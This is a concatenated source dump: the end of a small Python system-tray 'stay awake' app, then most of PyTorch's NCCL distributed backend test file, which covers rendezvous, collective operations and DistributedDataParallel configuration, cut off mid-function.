        icon.stop()
        window.destroy()
    def show_window(icon, item):
        # Stop the tray icon and restore the hidden window.
        icon.stop()
        window.after(0,window.deiconify)
    def withdraw_window():
        window.withdraw()
    image = Image.open("./icon/Z.ico")
    menu = (item('Show', show_window), item('Quit', quit_window))
    icon = pystray.Icon("name", image, "Stay Awake, Don't Sleep!", menu)
    # NOTE(review): pystray's icon.run() typically blocks; the statements below
    # (close-to-tray hook, withdraw, mainloop) only execute after the icon
    # stops (Show/Quit clicked) — confirm this ordering is intended.
    icon.run()
    #Close to Tray
    window.protocol("WM_DELETE_WINDOW", withdraw_window)
    #Start in Tray
    withdraw_window()
    #Main tkinter window loop
    window.mainloop()
    #Kill Second Thread
    thread.do_run = False
    thread.join()
# Entry point: launch the GUI/tray app only when run as a script.
if __name__ == "__main__":
    main()
|
test_c10d_nccl.py | # Owner(s): ["oncall: distributed"]
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_ROCM,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
# bfloat16 is only supported by CUDA 11+
BFLOAT16_AVAILABLE = (
torch.cuda.is_available()
and torch.version.cuda is not None
and int(torch.version.cuda.split('.')[0]) >= 11)
class RendezvousEnvTest(TestCase):
    """Checks env:// rendezvous error handling and env-var / query-string overrides."""
    @retry_on_connect_failures
    @requires_nccl()
    @sandcastle_skip_if(
        torch.cuda.device_count() == 0, "No GPUs available, skipping test"
    )
    def test_common_errors(self):
        vars = {
            "WORLD_SIZE": "1",
            "RANK": "0",
            "MASTER_ADDR": "127.0.0.1",
            "MASTER_PORT": str(common.find_free_port()),
        }
        class Env(object):
            # Context manager that replaces os.environ with `vars` for its duration.
            def __init__(self, vars):
                self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
            def __enter__(self):
                self.env_patcher.start()
            def __exit__(self, type, value, traceback):
                self.env_patcher.stop()
        def without(d, key):
            # Copy of d with one key removed.
            d = d.copy()
            d.pop(key)
            return d
        def withouts(d, keys):
            # Copy of d with several keys removed.
            d = d.copy()
            for key in keys:
                d.pop(key)
            return d
        # A missing env var makes bare env:// rendezvous fail, but the value
        # can be supplied as an init_process_group argument instead.
        with Env(without(vars, "WORLD_SIZE")):
            self.assertEqual(None, os.environ.get("WORLD_SIZE"))
            with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
                gen = c10d.rendezvous("env://")
                next(gen)
            c10d.init_process_group(backend="nccl", world_size=1)
            self.assertEqual(c10d.get_rank(), 0)
            self.assertEqual(c10d.get_world_size(), 1)
            c10d.destroy_process_group()
        with Env(without(vars, "RANK")):
            self.assertEqual(None, os.environ.get("RANK"))
            with self.assertRaisesRegex(ValueError, "RANK expected"):
                gen = c10d.rendezvous("env://")
                next(gen)
            c10d.init_process_group(backend="nccl", rank=0)
            self.assertEqual(c10d.get_rank(), 0)
            self.assertEqual(c10d.get_world_size(), 1)
            c10d.destroy_process_group()
        with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
            self.assertEqual(None, os.environ.get("RANK"))
            self.assertEqual(None, os.environ.get("WORLD_SIZE"))
            c10d.init_process_group(backend="nccl", rank=0, world_size=1)
            self.assertEqual(c10d.get_rank(), 0)
            self.assertEqual(c10d.get_world_size(), 1)
            c10d.destroy_process_group()
        with Env(vars):
            c10d.init_process_group(backend="nccl")
            self.assertEqual(c10d.get_rank(), 0)
            self.assertEqual(c10d.get_world_size(), 1)
            c10d.destroy_process_group()
        # MASTER_ADDR / MASTER_PORT have no argument fallback: rendezvous must fail.
        with Env(without(vars, "MASTER_ADDR")):
            self.assertEqual(None, os.environ.get("MASTER_ADDR"))
            with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
                gen = c10d.rendezvous("env://")
                next(gen)
        with Env(without(vars, "MASTER_PORT")):
            self.assertEqual(None, os.environ.get("MASTER_PORT"))
            with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
                gen = c10d.rendezvous("env://")
                next(gen)
        # Missing env vars can also be supplied via the URL query string.
        with Env(without(vars, "WORLD_SIZE")):
            self.assertEqual(None, os.environ.get("WORLD_SIZE"))
            gen = c10d.rendezvous("env://?world_size={}".format(1))
            _, _, size = next(gen)
            self.assertEqual(size, 1)
        with Env(without(vars, "RANK")):
            self.assertEqual(None, os.environ.get("RANK"))
            gen = c10d.rendezvous("env://?rank={}".format(0))
            _, rank, _ = next(gen)
            self.assertEqual(rank, 0)
        with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
            self.assertEqual(None, os.environ.get("RANK"))
            self.assertEqual(None, os.environ.get("WORLD_SIZE"))
            gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
            _, rank, size = next(gen)
            self.assertEqual(rank, 0)
            self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
    """Store timeout behavior for the NCCL backend."""
    @requires_nccl()
    @retry_on_connect_failures
    @sandcastle_skip_if(
        torch.cuda.device_count() == 0, "No GPUs available, skipping test"
    )
    def test_default_store_timeout_nccl(self):
        # Delegates to the shared AbstractTimeoutTest implementation.
        self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
    """Verifies ProcessGroupNCCL construction fails cleanly when no GPU is present."""
    MAIN_PROCESS_RANK = 0  # single-process test: rank 0, world size 1
    def setUp(self):
        self.rank = self.MAIN_PROCESS_RANK
        self.world_size = 1
        # Kept on disk (delete=False) so its path can be reused as a FileStore.
        self.file = tempfile.NamedTemporaryFile(delete=False)
    def tearDown(self):
        pass
    @requires_nccl()
    @sandcastle_skip_if(
        torch.cuda.device_count() > 0, "GPUs are available, skipping test"
    )
    def test_init_no_gpus(self):
        store = c10d.FileStore(self.file.name, self.world_size)
        with self.assertRaisesRegex(
            RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
        ):
            c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Avg (only available for NCCL 2.10+)
if torch.cuda.nccl.version() >= (2, 10, 0):
tensors = [torch.tensor([i + 1.]).cuda(i) for i in range(self.num_gpus)]
allreduce(tensors, c10d.ReduceOp.AVG)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
ndev = float(self.num_gpus)
self.assertEqualIgnoreType(
torch.tensor([ndev * (ndev + 1.) / (2. * ndev)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_reduce_ops(self):
        """Exercise ProcessGroupNCCL.reduce for every root tensor index and
        verify that bitwise ops (BAND/BOR/BXOR) are rejected by NCCL."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def reduce(xs, rootRank, rootTensor, op=None):
            # Blocking reduce wrapper; op=None leaves the backend default op.
            opts = c10d.ReduceOptions()
            opts.rootRank = rootRank
            opts.rootTensor = rootTensor
            if op:
                opts.reduceOp = op
            work = pg.reduce(xs, opts)
            work.wait()

        # for every root tensor
        for rt in range(self.num_gpus):
            tensors = []
            for i in range(self.num_gpus):
                tensors.append(torch.tensor([i + 1]).cuda(i))

            reduce(tensors, self.rank, rt)

            # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
            # Only the root tensor is checked: it holds 1 + 2 + ... + num_gpus.
            self.assertEqualIgnoreType(
                torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
                tensors[rt],
            )

            # Bitwise reductions are not supported by the NCCL backend and
            # must raise rather than silently compute something else.
            for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
                with self.assertRaisesRegex(
                    RuntimeError, "Cannot use " + str(op) + " with NCCL"
                ):
                    reduce(tensors, self.rank, rt, op)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_allgather_ops(self):
        """Allgather one tensor per local GPU; every output slot on every
        device must end up holding the tensor contributed by that slot's
        source."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def allgather(output_ts, input_ts):
            # Blocking allgather wrapper.
            work = pg.allgather(output_ts, input_ts)
            work.wait()

        tensors = []
        # One list of world_size * num_gpus zero-initialized output slots
        # per local GPU (index idx pins the slots to device idx).
        output_ts = [[] for _ in range(self.num_gpus)]

        for idx, ls in enumerate(output_ts):
            for _ in range(self.world_size * self.num_gpus):
                ls.append(torch.tensor([0]).cuda(idx))

        for i in range(self.num_gpus):
            tensors.append(torch.tensor([i]).cuda(i))

        allgather(output_ts, tensors)

        # Verification
        # Slot s on every device must contain torch.tensor([s]).
        for device_ts in output_ts:
            for s_idx, t in enumerate(device_ts):
                self.assertEqual(torch.tensor([s_idx]), t)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_allgather_base_ops(self):
        """_allgather_base happy path: each rank contributes [rank]; the flat
        output must equal arange(world_size)."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def allgather_base(output_t, input_t):
            # Blocking flat-allgather wrapper.
            work = pg._allgather_base(output_t, input_t)
            work.wait()

        device_id = self.rank % self.num_gpus
        # allgather_base is GPU number agnostic.
        # Each rank contribute one tensor regardless of GPU counts
        tensor = torch.tensor([self.rank]).cuda(device_id)
        output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)

        allgather_base(output_t, tensor)

        # Verification
        self.assertEqual(torch.arange(self.world_size), output_t)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_allgather_base_basics(self):
        """Input-validation checks for _allgather_base: a mis-sized output
        tensor and a dtype mismatch must each raise before communicating."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def allgather_base(output_t, input_t):
            work = pg._allgather_base(output_t, input_t)
            work.wait()

        device_id = self.rank % self.num_gpus
        # anticipate an error
        with self.assertRaisesRegex(
            RuntimeError,
            "output tensor size must be equal to world_size times input tensor size",
        ):
            tensor = torch.tensor([self.rank]).cuda(device_id)
            output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
                device_id
            )
            # fails the check because output_t is not correctly sized
            allgather_base(output_t, tensor)

        # anticipate an error
        with self.assertRaisesRegex(
            RuntimeError, "output tensor must have the same type as input tensor"
        ):
            tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
            output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
                device_id
            )
            # fails the check because the dtype is different
            allgather_base(output_t, tensor)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_reduce_scatter_base_basics(self):
        """Input-validation checks for _reduce_scatter_base: a mis-sized
        output tensor and a dtype mismatch must each raise before
        communicating."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def reduce_scatter_base(output_t, input_t):
            work = pg._reduce_scatter_base(output_t, input_t)
            work.wait()

        device_id = self.rank % self.num_gpus
        # anticipate an error
        with self.assertRaisesRegex(
            RuntimeError,
            "input tensor must be the same size as output size times world size",
        ):
            input_t = torch.tensor([self.rank]).cuda(device_id)
            output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
                device_id
            )
            # fails the check because output_t is not correctly sized
            reduce_scatter_base(output_t, input_t)

        # anticipate an error
        # NOTE(review): "outut" below presumably mirrors a typo in the
        # backend's actual error string — keep the two in sync; verify
        # against the C++ message before fixing either.
        with self.assertRaisesRegex(
            RuntimeError, "input tensor must be the same type as the outut tensor."
        ):
            tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
            output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
                device_id
            )
            # fails the check because the dtype is different
            reduce_scatter_base(output_t, tensor)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_reduce_scatter_ops(self):
        """reduce_scatter with SUM/MIN/MAX/PRODUCT over synthetic per-GPU
        input lists; expected values are derived from the arithmetic
        construction of the inputs below."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def reduce_scatter(outputs, input_lists, op):
            # Blocking reduce_scatter wrapper.
            opts = c10d.ReduceScatterOptions()
            opts.reduceOp = op
            work = pg.reduce_scatter(outputs, input_lists, opts)
            work.wait()

        # Flattened view of the (rank, gpu) grid: each local GPU acts as a
        # "virtual rank" in a world of num_gpus * world_size participants.
        virtual_rank = self.rank * self.world_size
        virtual_world_size = self.num_gpus * self.world_size

        output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]

        #           0                   1                   2
        #   0   [0..11]             [1..12]
        #   1   [3..14]
        #   2
        #   3

        # Sum
        # Input j on device i holds rank * num_gpus + i + j.
        tensor_lists = [
            [
                torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
                for j in range(virtual_world_size)
            ]
            for i in range(self.num_gpus)
        ]

        reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)

        for i in range(self.num_gpus):
            expected = torch.tensor(
                [
                    float(self.num_gpus * (self.num_gpus - 1) / 2)
                    + (virtual_rank + i) * virtual_world_size
                ]
            )
            # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
            self.assertEqualIgnoreType(expected, output[i])

        # Min
        reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)

        for i in range(self.num_gpus):
            expected = torch.tensor([self.rank * self.world_size + i])
            self.assertEqual(expected, output[i])

        # Max
        reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)

        for i in range(self.num_gpus):
            expected = torch.tensor(
                [self.rank * self.world_size + i + virtual_world_size - 1]
            )
            self.assertEqual(expected, output[i])

        # Product
        # Inputs are remapped into 1..virtual_world_size so every scattered
        # slot multiplies to virtual_world_size factorial.
        tensor_lists = [
            [
                torch.tensor(
                    [(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
                ).cuda(i)
                for j in range(virtual_world_size)
            ]
            for i in range(self.num_gpus)
        ]

        reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)

        for i in range(self.num_gpus):
            expected = torch.tensor([float(math.factorial(virtual_world_size))])
            # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
            self.assertEqualIgnoreType(expected, output[i])
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_reduce_scatter_base_ops(self):
        """_reduce_scatter_base happy path: every rank feeds
        arange(world_size); each rank's single output element is the sum of
        its own index across ranks, i.e. rank * world_size."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def reduce_scatter_base(output_t, input_t):
            # Blocking flat reduce-scatter wrapper.
            work = pg._reduce_scatter_base(output_t, input_t)
            work.wait()

        device_id = self.rank % self.num_gpus
        # reduce_scatter_base is GPU number agnostic.
        # Each rank contribute one tensor regardless of GPU counts
        output_t = torch.empty([1]).cuda(device_id)
        tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)

        reduce_scatter_base(output_t, tensor)

        # Verification
        self.assertEqual(output_t[0], self.rank * self.world_size)
    @requires_nccl()
    @sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
    def test_barrier(self):
        """Launch allreduces over 2..num_gpus GPUs WITHOUT waiting on their
        Work handles, then rely on barrier() to guarantee completion before
        the results are checked."""
        store = c10d.FileStore(self.file.name, self.world_size)
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        def allreduce(tensors):
            # Deliberately returns the Work handle un-waited; the barrier
            # below is the synchronization point under test.
            opts = c10d.AllreduceOptions()
            work = pg.allreduce(tensors, opts)
            return work

        # Making the collective to operate on
        # 2, 3, ..., self.num_gpus GPUs
        tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
        for i in range(2, self.num_gpus + 1):
            for j in range(i):
                tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))

        works = []
        for tensors in tensors_list:
            work = allreduce(tensors)
            works.append(work)

        # Barrier will ensure that all previous work is completed
        pg.barrier().wait()

        for i in range(2, self.num_gpus + 1):
            for j in range(i):
                # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
                # Each entry holds sum(1..i) after the allreduce over i GPUs.
                self.assertEqualIgnoreType(
                    torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
                )
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_nccl_propagate_error_reason(self):
        """Rank 0 deliberately skips an allreduce so the other ranks time out;
        a later use of the communicator must surface the original timeout
        reason (including the offending tensor shape) in its error."""
        # Need to use NCCL_BLOCKING_WAIT and not ASYNC_ERROR_HANDLING,
        # otherwise process will be taken down and we can't check for errors.
        os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
        os.environ["NCCL_BLOCKING_WAIT"] = "1"
        # TODO: smaller timeout can fail since PG NCCl does health check in
        # constructor. Look into reducing this test's runtime.
        store = c10d.FileStore(self.file_name, self.world_size)
        # provide sufficient timeout to initialize NCCL comm.
        pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size, timeout=timedelta(seconds=15))
        # Gloo group is used purely as an out-of-band sync so rank 0 can be
        # blocked/unblocked without touching the NCCL communicator under test.
        pg_gloo = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
        pg.barrier().wait(timedelta(seconds=5))
        # Simulate stuckness in rank 0.
        if self.rank == 0:
            pg_gloo.barrier().wait()
        inp = torch.ones(1).cuda(self.rank)

        if self.rank != 0:
            # Time out due to rank 0 not calling into allreduce.
            with self.assertRaises(RuntimeError):
                pg.allreduce([inp]).wait(timedelta(seconds=5))

            # Now when nonzero rank attempts to use communicator, original failure reason should be logged.
            try:
                pg.allreduce([torch.ones(2).cuda(self.rank)]).wait()
            except RuntimeError as e:
                self.assertTrue("timed out in call to wait()" in str(e))
                self.assertTrue("TensorShape=[1]" in str(e))
            else:
                self.fail("Expected error to be raised!")

            # Unblock rank 0
            pg_gloo.barrier().wait()

        # TODO: We can also test that if rank 0 attempts to use the communicator,
        # then we should error out with the info that it was aborted due to
        # timeout on another rank. Although this would only be the case after
        # the watchdog has run on the rank, and there is no reliable way
        # to confirm it has run.
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_nccl_backend_single_device_module_device_ids_None(self):
        """Single-device module with device_ids=None (the documented default)."""
        self._test_nccl_backend(None, None)
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_nccl_backend_single_device_module_empty_device_ids(self):
        """Single-device module with device_ids=[] (legacy spelling of None)."""
        # This tests the backward compatibility of accepting an empty list as `device_ids`,
        # although we no longer document this in favor of the default value of `None`,
        # which is consistent with multi-device modules and CPU modules.
        self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
    @requires_nccl()
    @skip_if_lt_x_gpu(4)
    def test_ddp_multi_device_module_config(self):
        """Misconfigurations of a multi-device module must raise ValueError:
        output_device with a multi-device module, multi-element device_ids,
        and mixed CPU/GPU placement."""
        gpus = gpus_for_rank(self.world_size)[self.rank]

        self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")

        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        gpus = gpus[:2]
        model = DoubleGpuNet(gpus)

        # output_device is not valid for a module that spans devices.
        with self.assertRaisesRegex(
            ValueError,
            "DistributedDataParallel device_ids and output_device arguments only work with "
            "single-device/multiple-device GPU modules or CPU modules",
        ):
            ddp_model = DistributedDataParallel(
                model, output_device=gpus[1], process_group=process_group
            )

        with self.assertRaisesRegex(
            ValueError, "device_ids can only be None or contain a single element."
        ):
            ddp_model = DistributedDataParallel(
                model, device_ids=gpus, process_group=process_group
            )

        # Moving one submodule to CPU creates a mixed-device module.
        with self.assertRaisesRegex(
            ValueError, "input module must be on the same type of devices"
        ):
            model.fc1 = model.fc1.cpu()
            ddp_model = DistributedDataParallel(model, process_group=process_group)

        # Even a pure-CPU module still rejects multi-element device_ids.
        model = model.cpu()
        with self.assertRaisesRegex(
            ValueError, "device_ids can only be None or contain a single element."
        ):
            ddp_model = DistributedDataParallel(
                model, device_ids=gpus, process_group=process_group
            )
    def _test_fp16(self, gradient_as_bucket_view=False):
        """Train one step of a half-precision linear model under DDP and
        assert the reduced gradients did not overflow to inf (DDP must
        normalize by world_size before reducing)."""
        store = c10d.FileStore(self.file_name, self.world_size)
        process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)

        gpus = gpus_for_rank(self.world_size)[self.rank]
        model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
        nn.init.constant_(model.weight, 1)
        ddp_model = DistributedDataParallel(
            model,
            device_ids=[gpus[0]],
            process_group=process_group,
            # Tiny bucket cap forces multiple buckets even for this 1-param model.
            bucket_cap_mb=0.001,
            gradient_as_bucket_view=gradient_as_bucket_view,
        )

        # Input 2**15, so that the gradients will overflow with a
        # world_size of 2, unless we normalize the gradient by the
        # world_size before the reduction
        input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()

        # Step model
        ddp_model.train()
        output = ddp_model(input)
        loss = output.sum()
        loss.backward()

        self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_fp16(self):
        """fp16 DDP smoke test with default (non-view) gradients."""
        self._test_fp16()
    @requires_nccl()
    @skip_if_lt_x_gpu(2)
    def test_fp16_grad_is_view(self):
        """fp16 DDP smoke test with gradient_as_bucket_view enabled."""
        self._test_fp16(gradient_as_bucket_view=True)
    def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
        """
        Verify DDP locates output tensors nested inside arbitrary containers
        (tuple/list/dict, nested) returned from forward, so the reducer sees
        hooks for all used parameters.

        Note: this test can be sped up by only running it on a CPU module
        once DistributedDataParallel supports them.
        """
        store = c10d.FileStore(self.file_name, self.world_size)
